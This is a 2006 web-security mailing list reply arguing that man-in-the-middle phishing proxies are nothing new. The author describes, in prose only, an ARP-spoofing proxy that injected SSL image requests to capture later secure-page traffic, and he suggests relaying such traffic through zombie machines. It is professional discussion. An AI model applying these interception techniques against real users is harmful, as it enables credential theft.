WebApp Sec mailing list archives
Re: Mitm new?
From: Rogan Dawes <discard () dawes za net>
Date: Thu, 17 Aug 2006 10:32:34 +0200
Jeff Robertson wrote:
Why are man-in-the-middle phishing sites suddenly talked about as a "new" threat, as if there was rocket science involved? For instance http://blog.washingtonpost.com/securityfix/2006/07/citibank_phish_spoofs _2factor_1.html These things are basically proxies, which are as old as the web. Why does it surprise anyone to see these combined with phishing? (Then again, I still haven't figured out why phishing as we know it didn't "take off" circa 1994) Jeff Robertson
Yeah, there is nothing special about this.At the time of the IE HTTPS Certificate attack (http://security.e-matters.de/advisories/012001.html), I used a transparent (arp-spoofing) MITM proxy to insert image requests for an SSL page from the target into non-SSL pages that passed through my proxy. After that, any subsequent requests for the targeted secure pages (even via bookmark, etc), passed through my proxy, and I could record/alter, etc any fields that I wanted to.
I guess one of the deterrents to using this technique is that the source of all the connections would appear to come from a single IP. Of course, it would not be too difficult to relay the connections via one or more zombie computers, exactly as they do currently to harvest credentials. This could introduce a lot of latency, which a user MIGHT notice.
Rogan ------------------------------------------------------------------------- Sponsored by: WatchfireWatchfire was recently named the worldwide market leader in Web application security assessment tools by both Gartner and IDC. Download a free trial of AppScan today and see why more customers choose AppScan then any other solution. Try it today! https://www.watchfire.com/securearea/appscancamp.aspx?id=701500000008VnB
--------------------------------------------------------------------------
Current thread:
- Mitm new? Jeff Robertson (Aug 16)
- Re: Mitm new? Rogan Dawes (Aug 18)
- Re: Mitm new? mikeiscool (Aug 18)
- Re: Mitm new? Nick Owen (Aug 18)
- <Possible follow-ups>
- Re: Mitm new? ROB DIXON (Aug 18)